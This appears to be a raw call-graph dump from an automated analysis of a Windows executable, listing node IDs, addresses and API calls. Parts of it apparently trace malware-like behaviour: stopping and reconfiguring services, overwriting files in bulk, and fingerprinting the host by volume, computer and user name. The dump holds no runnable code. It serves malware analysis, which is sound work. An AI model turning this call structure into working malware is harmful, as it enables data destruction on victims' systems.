102409->102410 102411 4047c9 102410->102411 102411->102242 102413 404085 FindResourceExW 102412->102413 102415 4040a2 102412->102415 102414 474f16 LoadResource 102413->102414 102413->102415 102414->102415 102416 474f2b SizeofResource 102414->102416 102415->102243 102416->102415 102417 474f3f LockResource 102416->102417 102417->102415 102419 404526 102418->102419 102420 474fe0 102418->102420 102424 423a8d 102419->102424 102422 404534 102422->102253 102423->102243 102425 423a99 _fseek 102424->102425 102426 423aa7 102425->102426 102428 423acd 102425->102428 102437 427c0e 47 API calls __getptd_noexit 102426->102437 102439 424e1c 102428->102439 102429 423aac 102438 426e10 8 API calls __wctomb_s_l 102429->102438 102434 423ae2 102446 423b04 LeaveCriticalSection LeaveCriticalSection _fseek 102434->102446 102436 423ab7 _fseek 102436->102422 102437->102429 102438->102436 102440 424e4e EnterCriticalSection 102439->102440 102441 424e2c 102439->102441 102443 423ad3 102440->102443 102441->102440 102442 424e34 102441->102442 102444 427cf4 __lock 47 API calls 102442->102444 102445 4239fe 81 API calls 4 library calls 102443->102445 102444->102443 102445->102434 102446->102436 102450 423839 102447->102450 102449 404510 102449->102262 102451 423845 _fseek 102450->102451 102452 423888 102451->102452 102453 423880 _fseek 102451->102453 102458 42385b _memset 102451->102458 102454 424e1c __lock_file 48 API calls 102452->102454 102453->102449 102455 42388e 102454->102455 102465 42365b 62 API calls 7 library calls 102455->102465 102463 427c0e 47 API calls __getptd_noexit 102458->102463 102459 423875 102464 426e10 8 API calls __wctomb_s_l 102459->102464 102460 4238a4 102466 4238c2 LeaveCriticalSection LeaveCriticalSection _fseek 102460->102466 102463->102459 102464->102453 102465->102460 102466->102453 102470 42344a GetSystemTimeAsFileTime 102467->102470 102469 44bdc3 102469->102264 102471 423478 __aulldiv 102470->102471 102471->102469 102473 423e71 _fseek 102472->102473 102474 423e94 102473->102474 102475 423e7f 102473->102475 102476 424e1c __lock_file 48 API calls 102474->102476 102486 427c0e 47 API calls __getptd_noexit 102475->102486 102478 423e9a 102476->102478 102488 423b0c 55 API calls 6 library calls 102478->102488 102479 423e84 102487 426e10 8 API calls __wctomb_s_l 102479->102487 102482 423ea5 102489 423ec5 LeaveCriticalSection LeaveCriticalSection _fseek 102482->102489 102484 423eb7 102485 423e8f _fseek 102484->102485 102485->102268 102486->102479 102487->102485 102488->102482 102489->102484 102491 421e55 102490->102491 102492 421e61 102490->102492 102491->102492 102505 421ed4 102491->102505 102509 429d6b 47 API calls 2 library calls 102491->102509 102514 427c0e 47 API calls __getptd_noexit 102492->102514 102494 422019 102499 421e41 102494->102499 102515 426e10 8 API calls __wctomb_s_l 102494->102515 102497 421fa0 102497->102492 102497->102499 102500 421fb0 102497->102500 102498 421f5f 102498->102492 102501 421f7b 102498->102501 102511 429d6b 47 API calls 2 library calls 102498->102511 102499->101973 102513 429d6b 47 API calls 2 library calls 102500->102513 102501->102492 102501->102499 102504 421f91 102501->102504 102512 429d6b 47 API calls 2 library calls 102504->102512 102505->102492 102508 421f41 102505->102508 102510 429d6b 47 API calls 2 library calls 102505->102510 102508->102497 102508->102498 102509->102505 102510->102508 102511->102501 102512->102499 102513->102499 102514->102494 102515->102499 102516->102200 102518 422aba _fseek 102517->102518 102519 422ad4 102518->102519 102520 422aec 102518->102520 102522 422ae4 _fseek 102518->102522 102595 427c0e 47 API calls __getptd_noexit 102519->102595 102523 424e1c __lock_file 48 API calls 102520->102523 102522->102213 102525 422af2 102523->102525 102524 422ad9 102596 426e10 8 API calls __wctomb_s_l 102524->102596 102583 422957 102525->102583 102531 4235f0 _fseek 102530->102531 102532 423604 102531->102532 102533 42361c 102531->102533 102769 427c0e 47 API calls __getptd_noexit 102532->102769 102536 424e1c __lock_file 48 API calls 102533->102536 102540 423614 _fseek 102533->102540 102535 423609 102770 426e10 8 API calls __wctomb_s_l 102535->102770 102538 42362e 102536->102538 102753 423578 102538->102753 102540->102204 102544 44c715 102543->102544 102545 44c6ff SetFileTime CloseHandle 102543->102545 102544->102181 102545->102544 102550 44c581 __tzset_nolock _wcscmp 102546->102550 102547 44c05f 102547->102178 102547->102181 102548 4044ed 64 API calls 102548->102550 102549 44bf5a GetSystemTimeAsFileTime 102549->102550 102550->102547 102550->102548 102550->102549 102551 404517 83 API calls 102550->102551 102551->102550 102553 44b970 102552->102553 102554 44b97e 102552->102554 102555 423499 117 API calls 102553->102555 102556 44b9c3 102554->102556 102557 423499 117 API calls 102554->102557 102582 44b987 102554->102582 102555->102554 102838 44bbe8 64 API calls 3 library calls 102556->102838 102558 44b9a8 102557->102558 102558->102556 102560 44b9b1 102558->102560 102564 4235e4 __fcloseall 83 API calls 102560->102564 102560->102582 102561 44ba07 102562 44ba2c 102561->102562 102563 44ba0b 102561->102563 102839 44b7e5 47 API calls __crtGetStringTypeA_stat 102562->102839 102566 44ba18 102563->102566 102568 4235e4 __fcloseall 83 API calls 102563->102568 102564->102582 102569 4235e4 __fcloseall 83 API calls 102566->102569 102566->102582 102567 44ba34 102570 44ba5a 102567->102570 102571 44ba3a 102567->102571 102568->102566 102569->102582 102840 44ba8a 90 API calls 102570->102840 102573 44ba47 102571->102573 102575 4235e4 __fcloseall 83 API calls 102571->102575 102577 4235e4 __fcloseall 83 API calls 102573->102577 102573->102582 102574 44ba61 102841 44bb64 102574->102841 102575->102573 102577->102582 102579 44ba75 102581 4235e4 __fcloseall 83 API calls 102579->102581 102579->102582 102580 4235e4 __fcloseall 83 API calls 102580->102579 102581->102582 102582->102210 102582->102217 102586 422966 102583->102586 102589 422984 102583->102589 102584 422974 102630 427c0e 47 API calls __getptd_noexit 102584->102630 102586->102584 102586->102589 102592 42299c ___crtGetEnvironmentStringsW 102586->102592 102587 422979 102631 426e10 8 API calls __wctomb_s_l 102587->102631 102597 422b24 LeaveCriticalSection LeaveCriticalSection _fseek 102589->102597 102592->102589 102598 422933 102592->102598 102605 42af61 102592->102605 102632 422c84 102592->102632 102638 428e63 78 API calls 7 library calls 102592->102638 102595->102524 102596->102522 102597->102522 102599 422952 102598->102599 102600 42293d 102598->102600 102599->102592 102639 427c0e 47 API calls __getptd_noexit 102600->102639 102602 422942 102640 426e10 8 API calls __wctomb_s_l 102602->102640 102604 42294d 102604->102592 102606 42af6d _fseek 102605->102606 102607 42af75 102606->102607 102608 42af8d 102606->102608 102714 427bda 47 API calls __getptd_noexit 102607->102714 102609 42b022 102608->102609 102614 42afbf 102608->102614 102719 427bda 47 API calls __getptd_noexit 102609->102719 102612 42af7a 102715 427c0e 47 API calls __getptd_noexit 102612->102715 102613 42b027 102720 427c0e 47 API calls __getptd_noexit 102613->102720 102641 42a8ed 102614->102641 102618 42b02f 102721 426e10 8 API calls __wctomb_s_l 102618->102721 102619 42afc5 102621 42afeb 102619->102621 102622 42afd8 102619->102622 102716 427c0e 47 API calls __getptd_noexit 102621->102716 102650 42b043 102622->102650 102623 42af82 _fseek 102623->102592 102626 42afe4 102718 42b01a LeaveCriticalSection __unlock_fhandle 102626->102718 102627 42aff0 102717 427bda 47 API calls __getptd_noexit 102627->102717 102630->102587 102631->102589 102633 422c97 102632->102633 102637 422cbb 102632->102637 102634 422933 __fflush_nolock 47 API calls 102633->102634 102633->102637 102635 422cb4 102634->102635 102636 42af61 __flush 78 API calls 102635->102636 102636->102637 102637->102592 102638->102592 102639->102602 102640->102604 102642 42a8f9 _fseek 102641->102642 102643 42a946 EnterCriticalSection 102642->102643 102644 427cf4 __lock 47 API calls 102642->102644 102645 42a96c _fseek 102643->102645 102646 42a91d 102644->102646 102645->102619 102647 42a93a 102646->102647 102648 42a928 InitializeCriticalSectionAndSpinCount 102646->102648 102722 42a970 LeaveCriticalSection _doexit 102647->102722 102648->102647 102651 42b050 __ftell_nolock 102650->102651 102652 42b0ac 102651->102652 102653 42b08d 102651->102653 102681 42b082 102651->102681 102656 42b105 102652->102656 102657 42b0e9 102652->102657 102732 427bda 47 API calls __getptd_noexit 102653->102732 102661 42b11c 102656->102661 102738 42f82f 49 API calls 3 library calls 102656->102738 102735 427bda 47 API calls __getptd_noexit 102657->102735 102658 42b86b 102658->102626 102659 42b092 102733 427c0e 47 API calls __getptd_noexit 102659->102733 102723 433bf2 102661->102723 102664 42b099 102734 426e10 8 API calls __wctomb_s_l 102664->102734 102666 42b0ee 102736 427c0e 47 API calls __getptd_noexit 102666->102736 102668 42b12a 102670 42b44b 102668->102670 102739 427a0d 47 API calls 2 library calls 102668->102739 102671 42b0f5 102737 426e10 8 API calls __wctomb_s_l 102671->102737 102678 42b150 GetConsoleMode 102678->102670 102746 42a70c 102681->102746 102714->102612 102715->102623 102716->102627 102717->102626 102718->102623 102719->102613 102720->102618 102721->102623 102722->102643 102724 433c0a 102723->102724 102725 433bfd 102723->102725 102727 433c16 102724->102727 102728 427c0e __set_osfhnd 47 API calls 102724->102728 102726 427c0e __set_osfhnd 47 API calls 102725->102726 102729 433c02 102726->102729 102727->102668 102730 433c37 102728->102730 102729->102668 102731 426e10 __wctomb_s_l 8 API calls 102730->102731 102731->102729 102732->102659 102733->102664 102734->102681 102735->102666 102736->102671 102737->102681 102738->102661 102739->102678 102747 42a716 IsProcessorFeaturePresent 102746->102747 102748 42a714 102746->102748 102750 4337b0 102747->102750 102748->102658 102751 43375f ___raise_securityfailure 5 API calls 102750->102751 102752 433893 102751->102752 102752->102658 102754 423587 102753->102754 102756 42359b 102753->102756 102799 427c0e 47 API calls __getptd_noexit 102754->102799 102757 423597 102756->102757 102758 422c84 __flush 78 API calls 102756->102758 102771 423653 LeaveCriticalSection LeaveCriticalSection _fseek 102757->102771 102760 4235a7 102758->102760 102759 42358c 102800 426e10 8 API calls __wctomb_s_l 102759->102800 102772 42eb36 102760->102772 102764 422933 __fflush_nolock 47 API calls 102765 4235b5 102764->102765 102776 42e9d2 102765->102776 102767 4235bb 102767->102757 102768 421c9d _free 47 API calls 102767->102768 102768->102757 102769->102535 102770->102540 102771->102540 102773 4235af 102772->102773 102774 42eb43 102772->102774 102773->102764 102774->102773 102775 421c9d _free 47 API calls 102774->102775 102775->102773 102777 42e9de _fseek 102776->102777 102778 42e9e6 102777->102778 102779 42e9fe 102777->102779 102816 427bda 47 API calls __getptd_noexit 102778->102816 102781 42ea7b 102779->102781 102786 42ea28 102779->102786 102820 427bda 47 API calls __getptd_noexit 102781->102820 102782 42e9eb 102817 427c0e 47 API calls __getptd_noexit 102782->102817 102785 42ea80 102821 427c0e 47 API calls __getptd_noexit 102785->102821 102788 42a8ed ___lock_fhandle 49 API calls 102786->102788 102790 42ea2e 102788->102790 102789 42ea88 102822 426e10 8 API calls __wctomb_s_l 102789->102822 102793 42ea41 102790->102793 102794 42ea4c 102790->102794 102792 42e9f3 _fseek 102792->102767 102801 42ea9c 102793->102801 102818 427c0e 47 API calls __getptd_noexit 102794->102818 102797 42ea47 102819 42ea73 LeaveCriticalSection __unlock_fhandle 102797->102819 102799->102759 102800->102757 102823 42aba4 102801->102823 102803 42eb00 102836 42ab1e 48 API calls __set_osfhnd 102803->102836 102805 42eaaa 102805->102803 102807 42aba4 __close_nolock 47 API calls 102805->102807 102815 42eade 102805->102815 102806 42eb08 102809 42ead5 102807->102809 102808 42aba4 __close_nolock 47 API calls 102810 42eaea CloseHandle 102808->102810 102812 42aba4 __close_nolock 47 API calls 102809->102812 102810->102803 102812->102815 102815->102803 102815->102808 102816->102782 102817->102792 102818->102797 102819->102792 102820->102785 102821->102789 102822->102792 102824 42abc4 102823->102824 102825 42abaf 102823->102825 102828 427bda __set_osfhnd 47 API calls 102824->102828 102830 42abe9 102824->102830 102826 427bda __set_osfhnd 47 API calls 102825->102826 102827 42abb4 102826->102827 102829 427c0e __set_osfhnd 47 API calls 102827->102829 102831 42abf3 102828->102831 102832 42abbc 102829->102832 102830->102805 102833 427c0e __set_osfhnd 47 API calls 102831->102833 102832->102805 102834 42abfb 102833->102834 102835 426e10 __wctomb_s_l 8 API calls 102834->102835 102835->102832 102836->102806 102838->102561 102839->102567 102840->102574 102842 44bb71 102841->102842 102844 44bb77 102841->102844 102843 421c9d _free 47 API calls 102842->102843 102843->102844 102845 421c9d _free 47 API calls 102844->102845 102846 44bb88 102844->102846 102845->102846 102847 44ba68 102846->102847 102848 421c9d _free 47 API calls 102846->102848 102847->102579 102847->102580 102848->102847 102849->101706 102850->101706 102851->101701 102852->101701 102853->101699 102854->101692 102855->101705 102856->101719 102857->101719 102858->101713 102859->101736 102860->101740 102861 403742 102862 40374b 102861->102862 102863 4037c8 102862->102863 102864 403769 102862->102864 102905 4037c6 102862->102905 102866 471e00 102863->102866 102867 4037ce 102863->102867 102868 403776 102864->102868 102869 40382c PostQuitMessage 102864->102869 102865 4037ab DefWindowProcW 102902 4037b9 102865->102902 102916 402ff6 16 API calls 102866->102916 102870 4037d3 102867->102870 102871 4037f6 SetTimer RegisterWindowMessageW 102867->102871 102873 403781 102868->102873 102874 471e88 102868->102874 102869->102902 102879 471da3 102870->102879 102880 4037da KillTimer 102870->102880 102875 40381f CreatePopupMenu 102871->102875 102871->102902 102876 403836 102873->102876 102877 403789 102873->102877 102922 444ddd 60 API calls _memset 102874->102922 102875->102902 102906 41eb83 102876->102906 102883 403794 102877->102883 102884 471e6d 102877->102884 102887 471ddc MoveWindow 102879->102887 102888 471da8 102879->102888 102913 403847 Shell_NotifyIconW _memset 102880->102913 102881 471e27 102917 41e312 346 API calls Mailbox 102881->102917 102890 40379f 102883->102890 102891 471e58 102883->102891 102884->102865 102921 43a5f3 48 API calls 102884->102921 102885 471e9a 102885->102865 102885->102902 102887->102902 102892 471dac 102888->102892 102893 471dcb SetFocus 102888->102893 102890->102865 102918 403847 Shell_NotifyIconW _memset 102890->102918 102920 4455bd 70 API calls _memset 102891->102920 102892->102890 102895 471db5 102892->102895 102893->102902 102894 4037ed 102914 40390f DeleteObject DestroyWindow Mailbox 102894->102914 102915 402ff6 16 API calls 102895->102915 102900 471e68 102900->102902 102903 471e4c 102919 404ffc 67 API calls _memset 102903->102919 102905->102865 102907 41eb9a _memset 102906->102907 102908 41ec1c 102906->102908 102923 4051af 102907->102923 102908->102902 102910 41ec05 KillTimer SetTimer 102910->102908 102911 41ebc1 102911->102910 102912 473c7a Shell_NotifyIconW 102911->102912 102912->102910 102913->102894 102914->102902 102915->102902 102916->102881 102917->102890 102918->102903 102919->102905 102920->102900 102921->102905 102922->102885 102924 4052a2 Mailbox 102923->102924 102925 4051cb 102923->102925 102924->102911 102945 406b0f 48 API calls 102925->102945 102927 4051d9 102928 473ca1 LoadStringW 102927->102928 102929 4051e6 102927->102929 102932 473cbb 102928->102932 102946 406a63 102929->102946 102931 4051fb 102931->102932 102933 40520c 102931->102933 102934 40510d 48 API calls 102932->102934 102935 405216 102933->102935 102936 4052a7 102933->102936 102939 473cc5 102934->102939 102957 40510d 102935->102957 102937 406eed 48 API calls 102936->102937 102942 405220 _memset _wcscpy 102937->102942 102939->102942 102966 40518c 102939->102966 102941 473ce7 102944 40518c 48 API calls 102941->102944 102943 405288 Shell_NotifyIconW 102942->102943 102943->102924 102944->102942 102945->102927 102947 406adf 102946->102947 102949 406a6f __NMSG_WRITE 102946->102949 102948 40b18b 48 API calls 102947->102948 102954 406ab6 ___crtGetEnvironmentStringsW 102948->102954 102950 406ad7 102949->102950 102951 406a8b 102949->102951 102977 40c369 48 API calls 102950->102977 102976 406b4a 48 API calls 102951->102976 102954->102931 102955 406a95 102956 41ee75 48 API calls 102955->102956 102956->102954 102958 471be7 102957->102958 102959 40511f 102957->102959 102987 43a58f 48 API calls ___crtGetEnvironmentStringsW 102958->102987 102978 40b384 102959->102978 102962 40512b 102962->102942 102963 471bf1 102964 406eed 48 API calls 102963->102964 102965 471bf9 Mailbox 102964->102965 102967 405197 102966->102967 102968 471ace 102967->102968 102969 40519f 102967->102969 103003 406b4a 48 API calls 102968->103003 102993 405130 102969->102993 102972 4051aa 102972->102941 102973 471adb __NMSG_WRITE 102974 41ee75 48 API calls 102973->102974 102975 471b07 ___crtGetEnvironmentStringsW 102974->102975 102976->102955 102977->102954 102979 40b3c5 ___crtGetEnvironmentStringsW 102978->102979 102980 40b392 102978->102980 102979->102962 102979->102979 102980->102979 102981 40b3b8 102980->102981 102982 40b3fd 102980->102982 102988 40bb85 102981->102988 102984 41f4ea 48 API calls 102982->102984 102985 40b407 102984->102985 102986 41f4ea 48 API calls 102985->102986 102986->102979 102987->102963 102989 40bb9b 102988->102989 102992 40bb96 ___crtGetEnvironmentStringsW 102988->102992 102990 471b77 102989->102990 102991 41ee75 48 API calls 102989->102991 102991->102992 102992->102979 102994 40513f __NMSG_WRITE 102993->102994 102995 471b27 102994->102995 102996 405151 102994->102996 103004 406b4a 48 API calls 102995->103004 102997 40bb85 48 API calls 102996->102997 102999 40515e ___crtGetEnvironmentStringsW 102997->102999 102999->102972 103000 471b34 103001 41ee75 48 API calls 103000->103001 103002 471b57 ___crtGetEnvironmentStringsW 103001->103002 103003->102973 103004->103000 103005 40e3e3 103006 40fe30 346 API calls 103005->103006 103019 40e3ef ___crtGetEnvironmentStringsW 103006->103019 103007 477bc6 103042 44cc5c 86 API calls 4 library calls 103007->103042 103009 477be4 103009->103009 103010 40e450 103011 40e80b Mailbox 103015 41f4ea 48 API calls 103011->103015 103012 40e731 103013 477bb7 103012->103013 103014 40e746 103012->103014 103041 45cd62 50 API calls 103013->103041 103016 41f4ea 48 API calls 103014->103016 103018 40e5ab ___crtGetEnvironmentStringsW 103015->103018 103030 40e644 103016->103030 103021 40e5d6 103018->103021 103023 41f4ea 48 API calls 103018->103023 103025 40e609 103018->103025 103019->103007 103019->103010 103019->103011 103020 41f4ea 48 API calls 103019->103020 103022 40e597 103019->103022 103019->103025 103020->103019 103021->103025 103036 40df5f 346 API calls 103021->103036 103022->103011 103024 40e5a4 103022->103024 103023->103021 103027 41f4ea 48 API calls 103024->103027 103025->103012 103026 477ba6 103025->103026 103025->103030 103032 477b7e 103025->103032 103034 477b59 103025->103034 103037 4056b0 346 API calls 103025->103037 103040 44cc5c 86 API calls 4 library calls 103026->103040 103027->103018 103039 44cc5c 86 API calls 4 library calls 103032->103039 103038 44cc5c 86 API calls 4 library calls 103034->103038 103036->103025 103037->103025 103038->103030 103039->103030 103040->103030 103041->103007 103042->103009 103043 ab520c 103046 adcbd0 103043->103046 103045 ab5211 103047 adbe50 _wcslen 103046->103047 103047->103045 103047->103046 103048 adc168 103047->103048 103051 adc78e CloseServiceHandle 103047->103051 103052 adbffd StrStrIW 103047->103052 103053 adbfe9 103047->103053 103054 adc706 StrStrIW 103047->103054 103055 adc72b StrStrIW 103047->103055 103057 adbf68 StrStrIW 103047->103057 103058 adc399 StrStrIW 103047->103058 103060 adc0fd CloseServiceHandle 103047->103060 103061 adc7e4 StartServiceW 103047->103061 103064 adbf7e 103047->103064 103065 adc65a ChangeServiceConfigW 103047->103065 103066 abce90 103047->103066 103084 ada350 CloseServiceHandle 103047->103084 103086 ab5d20 103047->103086 103085 ada905 LocalFree 103048->103085 103051->103047 103052->103047 103053->103045 103054->103047 103055->103047 103057->103047 103058->103047 103062 adc3a9 103058->103062 103060->103047 103061->103047 103062->103045 103063 adc36b OpenServiceW 103063->103047 103064->103061 103064->103063 103065->103047 103065->103053 103076 abcc9b _wcslen 103066->103076 103067 abd5c5 CreateFileW 103067->103076 103068 abd729 GetFileSizeEx 103070 abd8a1 CloseHandle 103068->103070 103068->103076 103069 abd426 103069->103070 103071 abd42a CloseHandle 103069->103071 103070->103076 103071->103076 103072 abcd5c lstrcmpiW 103072->103076 103074 ab5d20 VirtualAlloc VirtualFree 103074->103076 103075 abcca0 lstrcmpiW 103075->103076 103076->103047 103076->103066 103076->103067 103076->103068 103076->103069 103076->103070 103076->103071 103076->103072 103076->103074 103076->103075 103078 abd049 SetFilePointerEx 103076->103078 103079 abd378 CloseHandle 103076->103079 103080 abcfbb GetFileTime 103076->103080 103081 abcc92 103076->103081 103083 abd903 103076->103083 103091 ab8937 VirtualAlloc VirtualFree 103076->103091 103092 ab8470 VirtualAlloc VirtualFree 103076->103092 103078->103076 103079->103076 103080->103076 103081->103047 103082 aefdfc 40 API calls 103082->103083 103083->103081 103083->103082 103084->103047 103085->103053 103088 ab5d22 103086->103088 103087 ab5d39 VirtualAlloc 103087->103088 103088->103047 103088->103087 103089 ab5d46 VirtualFree 103088->103089 103089->103047 103091->103076 103093 ab7b23 103094 ab7b2b 103093->103094 103096 ab5f10 103093->103096 103095 ab6084 SetFilePointerEx 103095->103096 103096->103095 103097 ab5d90 103096->103097 103097->103097 103098 c13388 103112 c10fc8 103098->103112 103100 c13463 103115 c13278 103100->103115 103118 c144a8 GetPEB 103112->103118 103114 c11653 103114->103100 103116 c13281 Sleep 103115->103116 103117 c1328f 103116->103117 103119 c144d2 103118->103119 103119->103114 103120 abb180 103121 abb0de 103120->103121 103121->103120 103122 abb2a7 SetFilePointerEx 103121->103122 103124 abb196 103121->103124 103127 abb328 SetFilePointerEx 103121->103127 103130 abb0d0 SetFilePointerEx 103121->103130 103131 abb253 103121->103131 103123 abb1c6 103122->103123 103126 abb1df 103122->103126 103123->103126 103129 abb2e0 WriteFile 103123->103129 103124->103123 103125 abb3a6 103124->103125 103125->103127 103128 abb3b2 103125->103128 103130->103121 103132 abb054 103130->103132 103133 479bec 103168 410ae0 Mailbox ___crtGetEnvironmentStringsW 103133->103168 103137 41f4ea 48 API calls 103159 40fec8 103137->103159 103138 410509 103199 44cc5c 86 API calls 4 library calls 103138->103199 103139 41146e 103145 406eed 48 API calls 103139->103145 103142 411473 103198 44cc5c 86 API calls 4 library calls 103142->103198 103144 47a922 103163 40ffe1 Mailbox 103145->103163 103147 47a246 103151 406eed 48 API calls 103147->103151 103150 406eed 48 API calls 103150->103159 103151->103163 103152 47a873 103153 40d7f7 48 API calls 103153->103159 103154 47a30e 103154->103163 103194 4397ed InterlockedDecrement 103154->103194 103155 40ce19 48 API calls 103155->103168 103156 420f0a 52 API calls __cinit 103156->103159 103158 4397ed InterlockedDecrement 103158->103159 103159->103137 103159->103138 103159->103139 103159->103142 103159->103147 103159->103150 103159->103153 103159->103154 103159->103156 103159->103158 103160 47a973 103159->103160 103159->103163 103164 4115b5 103159->103164 103188 411820 346 API calls 2 library calls 103159->103188 103189 411d10 59 API calls Mailbox 103159->103189 103200 44cc5c 86 API calls 4 library calls 103160->103200 103162 47a982 103197 44cc5c 86 API calls 4 library calls 103164->103197 103166 40fe30 346 API calls 103166->103168 103167 47a706 103195 44cc5c 86 API calls 4 library calls 103167->103195 103168->103155 103168->103159 103168->103163 103168->103166 103168->103167 103170 411526 Mailbox 103168->103170 103171 41f4ea 48 API calls 103168->103171 103172 4397ed InterlockedDecrement 103168->103172 103175 456ff0 103168->103175 103184 44b55b 103168->103184 103190 45ef61 82 API calls 2 library calls 103168->103190 103191 45f0ac 90 API calls Mailbox 103168->103191 103192 44a6ef 48 API calls 103168->103192 103193 45e822 346 API calls Mailbox 103168->103193 103196 44cc5c 86 API calls 4 library calls 103170->103196 103171->103168 103172->103168 103176 40936c 81 API calls 103175->103176 103177 45702a 103176->103177 103201 40b470 103177->103201 103179 45703a 103180 40fe30 346 API calls 103179->103180 103181 45705f 103179->103181 103180->103181 103183 457063 103181->103183 103229 40cdb9 48 API calls 103181->103229 103183->103168 103185 44b564 103184->103185 103187 44b569 103184->103187 103247 44a4d5 103185->103247 103187->103168 103188->103159 103189->103159 103190->103168 103191->103168 103192->103168 103193->103168 103194->103163 103195->103170 103196->103163 103197->103163 103198->103152 103199->103144 103200->103162 103230 406b0f 48 API calls 103201->103230 103203 40b69b 103233 40ba85 103203->103233 103205 40b6b5 Mailbox 103205->103179 103208 40ba85 48 API calls 103223 40b495 103208->103223 103209 47397b 103245 4426bc 88 API calls 4 library calls 103209->103245 103212 40b9e4 103246 4426bc 88 API calls 4 library calls 103212->103246 103213 473973 103213->103205 103216 473989 103218 40ba85 48 API calls 103216->103218 103217 40bcce 48 API calls 103217->103223 103218->103213 103219 473909 103243 406b4a 48 API calls 103219->103243 103220 40bb85 48 API calls 103220->103223 103222 473914 103227 41f4ea 48 API calls 103222->103227 103223->103203 103223->103208 103223->103209 103223->103212 103223->103217 103223->103219 103223->103220 103225 40bdfa 48 API calls 103223->103225 103228 473939 ___crtGetEnvironmentStringsW 103223->103228 103231 40c413 59 API calls 103223->103231 103232 40bc74 48 API calls 103223->103232 103241 40c6a5 49 API calls 103223->103241 103242 40c799 48 API calls ___crtGetEnvironmentStringsW 103223->103242 103226 40b66c CharUpperBuffW 103225->103226 103226->103223 103227->103228 103244 4426bc 88 API calls 4 library calls 103228->103244 103229->103183 103230->103223 103231->103223 103232->103223 103234 40bb25 103233->103234 103237 40ba98 ___crtGetEnvironmentStringsW 103233->103237 103236 41f4ea 48 API calls 103234->103236 103235 41f4ea 48 API calls 103239 40ba9f 103235->103239 103236->103237 103237->103235 103238 40bac8 103238->103205 103239->103238 103240 41f4ea 48 API calls 103239->103240 103240->103238 103241->103223 103242->103223 103243->103222 103244->103213 103245->103216 103246->103213 103248 44a4ec 103247->103248 103260 44a5ee 103247->103260 103249 44a5d4 Mailbox 103248->103249 103252 44a58b 103248->103252 103254 44a4fd 103248->103254 103250 41f4ea 48 API calls 103249->103250 103251 44a54c Mailbox ___crtGetEnvironmentStringsW 103250->103251 103257 41f4ea 48 API calls 103251->103257 103253 41f4ea 48 API calls 103252->103253 103253->103251 103258 41f4ea 48 API calls 103254->103258 103262 44a51a 103254->103262 103255 44a555 103261 41f4ea 48 API calls 103255->103261 103256 44a545 103259 41f4ea 48 API calls 103256->103259 103257->103260 103258->103262 103259->103251 103260->103187 103263 44a55b 103261->103263 103262->103251 103262->103255 103262->103256 103267 449d2d 48 API calls 103263->103267 103265 44a567 103268 41e65e 50 API calls 103265->103268 103267->103265 103268->103251 103269 4719cb 103274 402322 103269->103274 103271 4719d1 103307 420f0a 52 API calls __cinit 103271->103307 103273 4719db 103275 402344 103274->103275 103308 4026df 103275->103308 103280 40d7f7 48 API calls 103281 402384 103280->103281 103282 40d7f7 48 API calls 103281->103282 103283 40238e 103282->103283 103284 40d7f7 48 API calls 103283->103284 103285 402398 103284->103285 103286 40d7f7 48 API calls 103285->103286 103287 4023de 103286->103287 103288 40d7f7 48 API calls 103287->103288 103289 4024c1 103288->103289 103316 40263f 103289->103316 103293 4024f1 103294 40d7f7 48 API calls 103293->103294 103295 4024fb 103294->103295 103345 402745 103295->103345 103297 402546 103298 402556 GetStdHandle 103297->103298 103299 4025b1 103298->103299 103300 47501d 103298->103300 103301 4025b7 CoInitialize 103299->103301 103300->103299 103302 475026 103300->103302 103301->103271 103352 4492d4 53 API calls 103302->103352 103304 47502d 103353 4499f9 CreateThread 103304->103353 103306 475039 CloseHandle 103306->103301 103307->103273 103354 402854 103308->103354 103311 406a63 48 API calls 103312 40234a 103311->103312 103313 40272e 103312->103313 103368 4027ec 6 API calls 103313->103368 103315 40237a 103315->103280 103317 40d7f7 48 API calls 103316->103317 103318 40264f 103317->103318 103319 40d7f7 48 API calls 103318->103319 103320 402657 103319->103320 103369 4026a7 103320->103369 103323 4026a7 48 API calls 103324 402667 103323->103324 103325 40d7f7 48 API calls 103324->103325 103326 402672 103325->103326 103327 41f4ea 48 API calls 103326->103327 103328 4024cb 103327->103328 103329 4022a4 103328->103329 103330 4022b2 103329->103330 103331 40d7f7 48 API calls 103330->103331 103332 4022bd 103331->103332 103333 40d7f7 48 API calls 103332->103333 103334 4022c8 103333->103334 103335 40d7f7 48 API calls 103334->103335 103336 4022d3 103335->103336 103337 40d7f7 48 API calls 103336->103337 103338 4022de 103337->103338 103339 4026a7 48 API calls 103338->103339 103340 4022e9 103339->103340 103341 41f4ea 48 API calls 103340->103341 103342 4022f0 103341->103342 103343 471fe7 103342->103343 103344 4022f9 RegisterWindowMessageW 103342->103344 103344->103293 103346 402755 103345->103346 103347 475f4d 103345->103347 103349 41f4ea 48 API calls 103346->103349 103374 44c942 50 API calls 103347->103374 103351 40275d 103349->103351 103350 475f58 103351->103297 103352->103304 103353->103306 103375 4499df 54 API calls 103353->103375 103361 402870 103354->103361 103357 402870 48 API calls 103358 402864 103357->103358 103359 40d7f7 48 API calls 103358->103359 103360 402716 103359->103360 103360->103311 103362 40d7f7 48 API calls 103361->103362 103363 40287b 103362->103363 103364 40d7f7 48 API calls 103363->103364 103365 402883 103364->103365 103366 40d7f7 48 API calls 103365->103366 103367 40285c 103366->103367 103367->103357 103368->103315 103370 40d7f7 48 API calls 103369->103370 103371 4026b0 103370->103371 103372 40d7f7 48 API calls 103371->103372 103373 40265f 103372->103373 103373->103323 103374->103350 103376 ab5085 103377 ab5089 103376->103377 103378 ab506f 103376->103378 103381 ad8550 103378->103381 103380 ab5078 103402 ad8556 103381->103402 103382 ad8145 GetLastError 103400 ad7dd7 103382->103400 103383 ad8579 FreeSid 103383->103402 103384 ad83fb GetUserNameW 103384->103400 103385 ad8bc1 GetLastError 103385->103402 103386 ad8209 GetUserNameW 103386->103400 103404 ad7d37 103386->103404 103387 ad8986 SetEntriesInAclW 103387->103402 103388 ad890b LocalFree 103388->103402 103389 ad89cd OpenMutexW 103389->103380 103391 ad824a GetLastError 103391->103380 103391->103400 103392 ad836e GetLastError 103392->103400 103393 ad7d6c GetVolumeInformationW 103393->103380 103394 ad7d30 103394->103393 103394->103404 103395 ad8599 103395->103394 103399 ad896a wsprintfW 103395->103399 103396 ad7d20 103396->103393 103396->103394 103397 ad7d83 GetWindowsDirectoryW 103396->103397 103403 ad7e06 GetComputerNameW 103396->103403 103396->103404 103397->103394 103397->103404 103398 ad7fd4 GetLastError 103398->103400 103399->103394 103400->103382 103400->103384 103400->103386 103400->103391 103400->103392 103400->103393 103400->103394 103400->103396 103400->103398 103400->103404 103405 ad7f6b 